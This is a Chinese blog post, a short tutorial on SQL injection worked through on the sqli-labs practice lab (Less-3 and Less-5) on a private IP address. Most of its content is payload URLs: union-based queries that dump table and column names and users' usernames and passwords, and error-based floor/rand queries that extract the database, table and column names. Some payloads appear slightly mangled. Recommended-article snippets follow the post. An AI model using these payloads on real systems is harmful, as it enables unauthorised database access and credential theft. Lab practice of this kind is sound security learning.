SQL注入知多少

于 2019-05-19 22:11:50 发布
阅读量131 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43473573/article/details/90348894
版权
1、测试交互方法,判断浏览器提交数据和web服务器的交互方式

Get提交——提交的数据在URL中显示
POST提交——提交的数据不在URL中显示

2、判断提交变量的字符类型

整型——id=1 and 1=2 //让提交数据为假,有交互数据显示则为整型,否则为str(字符串);
字符串——id=1 and 1=2 无交互显示,则进一步判断闭合方式
常见的闭合方法 ‘’ “” () (‘’) (“ ”) 等。–+注释 PS: ’)语句–+

3、构造闭合(整型不需要),在闭合中写入SQL语句并判断数据库表的行数

在这里插入图片描述
在有显示的行输入需要回显的SQL语句
在这里插入图片描述

4、判断显示位
5、找库名–表名–列名–数据
举例:

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
http://192.168.230.135/sqli-labs-master/Less-3/?id=-1')%20union%20all%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20TABLE_schema%20=%20%27security%27%20–+

在这里插入图片描述
http://192.168.230.135/sqli-labs-master/Less-3/?id=-1')%20union%20all%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20TABLE_name%20=%20%27users%27%20and%20table_schema%20=%27security%27%20–+
在这里插入图片描述
http://192.168.230.135/sqli-labs-master/Less-3/?id=-1')%20union%20all%20select%201,group_concat(username),group_concat(password)%20from%20users%20–+
在这里插入图片描述

举例

http://192.168.230.135/sqli-labs-master/Less-5/?id=1
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
http://192.168.230.135/sqli-labs-master/Less-5/?id=1' AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20–
在这里插入图片描述
http://192.168.230.135/sqli-labs-master/Less-5/?id=1' AND(SELECT%201%20FROM%20(SELECT%20COUNT(),CONCAT((SELECT(SELECT%20CONCAT(CAST(table_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20–+
在这里插入图片描述
http://192.168.230.135/sqli-labs-master/Less-5/?id=1' AND (SELECT%201%20FROM%20(SELECT%20COUNT(),CONCAT((SELECT(SELECT%20CONCAT(CAST(column_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name=0x656d61696c73%20AND%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20–+
在这里插入图片描述
http://192.168.230.135/sqli-labs-master/Less-5/?id=1' AND (SELECT%201%20FROM%20(SELECT%20COUNT(),CONCAT((SELECT(SELECT%20CONCAT(CAST(CONCAT(id)%20AS%20CHAR),0x7e))%20FROM%20security.emails%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20–+
在这里插入图片描述

腻腻哈哈
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql order by sql注入_sql注入之order by猜列数问题
weixin_29452603的博客
01-20 1194
环境: xampp-win32-5.6.3-0-VC11 dvwa-1.0.8前言有幸在网上搜到一款非常不错的渗透测试演练系统 — dvwa ,作为学习,演练真的非常强大啊! 在学习的过程中也遇到一些问题,所以这里做学习分享记录。问题简述在用dvwa做sql 注入检测时,遇到一个小小的问题 — order by 猜出来的列数跟数据库表中的列数不匹配。(注入时猜出来两个字段,但是实际数据库的表中却...
SQL注入详解
L_longqihang的博客
04-15 559
SQL注入 原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。平台层注入由不安全的数据库配置或数据库平台的漏洞所致;代码层主要是由于程序员对输入未进行细致地过滤...
SQL语言
weixin_30834783的博客
04-07 228
01SQL 语言基础 ·什么是 SQL 语言   a) SQL, Structured Query Language, 结构化查询语言   b) SQL 是最重要的关系数据库操作语言,是所有关系数据库管理系统的标准语言.  c) SQL 语言是非过程化的语言, 只需要告诉做什么, 不需要关注怎么做, 简单. ·SQL 语言可以做什么 ...
mysql报错注入学习笔记 语句的执行
weixin_34102807的博客
03-25 144
学习到mysql 数据库 利用报错进行注入,整理了一下个人的学习笔记,仅限于个人的理解。数据库名--------注入语句 得到数据库名and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from...
SQL注入专题
巅峰测试
08-03 1786
     SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别, 所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。    随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码
SQL必会.pdf
01-16
可以使用参数化查询、输入验证、限制数据库权限等方法来避免 SQL 注入。 9.4 如何提高 SQL 查询的效率 可以使用索引、优化查询语句、使用缓存等方法来提高 SQL 查询的效率。 9.5 如何使用 SQL 语言 可以使用 SQL...
瑞友天翼2024SQL注入漏洞poc
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本存在SQL注入漏洞,而POC(Proof of Concept)是指概念验证,通常是一个简单的程序或脚本,用于证明某个安全漏洞确实存在。在网络安全领域,POC是黑客...
变Eshop20081212
06-08
7. **安全性**:考虑到电子商务的安全性至关重要,此版本可能采用了SSL加密、验证码、防止SQL注入等安全措施,保护用户数据和交易安全。 8. **营销工具**:可能包括优惠券、促销活动、积分系统等功能,帮助商家进行...
SQL必会+第4版_django_
10-04
防止SQL注入,通过使用参数化查询或预编译语句,是防止攻击的重要步骤。同时,优化查询,比如避免N+1查询,使用适当的数据类型和存储过程,可以提高应用的整体性能。 综上所述,结合SQL必会的识与Django的...
7.15 陇东学院云计算1班 马陆辉 20240715
07-15
练习题
090N03LS-VB QFN8(5X6)一款N-Channel沟道DFN8(5X6)的MOSFET晶体管参数介绍与应用说明
07-15
090N03LS-VB QFN8(5X6);Package:DFN8(5X6);Configuration:Single-N-Channel;VDS:30V;VGS:20(±V);Vth:1.7V;RDS(ON)=9mΩ@VGS=4.5V;RDS(ON)=7mΩ@VGS=10V;ID:80A;Technology:Trench;
Hadoop和Spark多节点集群搭建:从入门到进阶0基础!!易懂!!
最新发布
07-15
详细介绍了如何从入门到进阶搭建和管理Hadoop和Spark的多节点集群。首先,文章解释了多节点集群的概念和优势,然后提供了硬件和软件环境的准备步骤,包括Java和SSH配置。接着,文章分步骤指导如何下载、安装和配置Hadoop和Spark,涵盖环境变量设置、配置文件编辑和集群启动等关键步骤。还包括如何监控和优化集群资源使用,并解决常见问题,如节点通信问题和任务失败。最后,文章提供了进一步学习和扩展的建议,帮助读者深入掌握大数据处理技术。希望通过这份指南,初学者能成功搭建高效的Hadoop和Spark集群,提升数据处理能力。Hadoop和Spark多节点集群搭建Hadoop和Spark多节点集群搭建Hadoop和Spark多节点集群搭建Hadoop和Spark多节点集群搭建Hadoop和Spark多节点集群搭建Hadoop和Spark多节点集群搭建Hadoop和Spark多节点集群搭建Hadoop和Spark多节点集群搭建Hadoop和Spark多节点集群搭建Hadoop和Spark多节点集群搭建Hadoop和Spark多节点集群搭建Hadoop和Spark多节点集群搭建Hadoop和
Spring Cloud Azure使用详解.pdf
07-15
Spring Cloud Azure使用详解
简约工作汇报模板
07-15
【作品名称】:简约工作汇报模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
管家婆SQL数据字典.doc
07-15
数据库
openssl自签证书
07-15
快速生成自签证书
南京师范大学考研,58个专业课历年考试真题及答案汇总整理,备考资料题库视频.pdf
07-15
南京师范大学考研,58个专业课历年考试真题及答案汇总整理,备考资料题库视频.pdf
昆明医科大学考研15个学院,61个专业课历年考试真题及答案汇总,备考资料题库笔记,录用名单汇总.pdf
07-15
昆明医科大学考研15个学院,61个专业课历年考试真题及答案汇总,备考资料题库笔记,录用名单汇总.pdf
C# socket 服务端时,每接受一个客户端时,调用一个类
07-15
C# socket 服务端时,每接受一个客户端时,调用一个类 在C#中,使用Socket开发网络应用时,可以在接受每个客户端连接时创建一个新的类实例来处理与该客户端的通信。以下是一个简单的示例。
Oracle PL/SQL必会
05-05
9. 安全性:在编写PL/SQL代码时需要注意安全问题,如避免SQL注入攻击、对敏感数据进行加密等。 以上是Oracle PL/SQL必会的一些识点,掌握它们可以帮助开发人员更好地使用Oracle数据库进行应用程序开发。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值